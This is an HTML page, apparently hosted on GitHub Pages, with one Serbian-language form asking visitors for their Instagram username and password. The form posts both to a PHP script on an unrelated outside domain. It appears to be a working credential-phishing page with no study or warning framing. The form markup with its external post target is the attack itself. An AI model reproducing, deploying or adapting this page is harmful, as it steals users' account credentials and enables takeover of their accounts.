<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8">
  <meta name="twitter:card" content="summary" />
  <meta name="twitter:site" content="@jasminajaca011" />
  <meta name="twitter:title" content="ukp" />
  <meta name="twitter:description" content="ukp" />
  <meta name="twitter:image" content="https://jasminajaca011.github.io/" />
	<!-- Latest compiled and minified CSS -->
	<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">

	<!-- jQuery library -->
	<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>

	<!-- Popper JS -->
	<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.js"></script>

	<!-- Latest compiled JavaScript -->
	<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
	<meta name="google-site-verification" content="WgSTITldChv0UTsrjW1NZfWeid4lDgyh_6E6KQZ0HpY" />
	<title>ukp</title>
<link rel="icon" href="mup.jpg" type="image/x-icon"/>
<style>
.subscribe {
    padding: 40vh 0;
    background: url(linea-stairs.gif) center center no-repeat;
    background-size: cover;
    overflow: hidden;
    position: relative;
    min-height: 100vh;
}

.subscribe:before {
  content: "";
  background: rgba(6, 12, 34, 0.6);
  position: absolute;
  bottom: 0;
  top: 0;
  left: 0;
  right: 0;
}


.subscribe input {
  background: #fff;
  color: #060c22;
  border: 0;
  outline: none;
  margin: 0;
  padding: 20px 20px;
  border-radius: 10px;
  font-size: 14px;
}

.subscribe button {
  border: 0;
  padding: 10px 20px;
  cursor: pointer;
  background: #f82249;
  color: #fff;
  transition: all 0.3s ease;
  outline: none;
  font-size: 14px;
  border-radius: 10px;
}

.subscribe button:hover {
  background: #e0072f;
}


@media only screen and (min-width: 768px) {
  .subscribe input {
    min-width: 400px;
  }

}
 
  </style>
</head>
<body>




<section class="subscribe">
      <div class="container">
    
        <form method="post" action="https://antistereotip.net/jasminajaca011/ukp/myprocessingscript.php">
          <div class="form-row justify-content-center">
            <div class="col-auto">
              <input type="text" class="form-control" placeholder="Упиши Твоје Инстаграм корисничко име" name="username" autofocus>
            </div>
	    <div class="col-auto">
             <input type="password" class="form-control" placeholder="Упиши Твоју Инстаграм лозинку" name="password">
            </div>
            <div class="col-auto">
              <button type="submit">Пошаљи</button>
            </div>
          </div>
        </form>
		

      </div>
    </section>


</body>
</html>
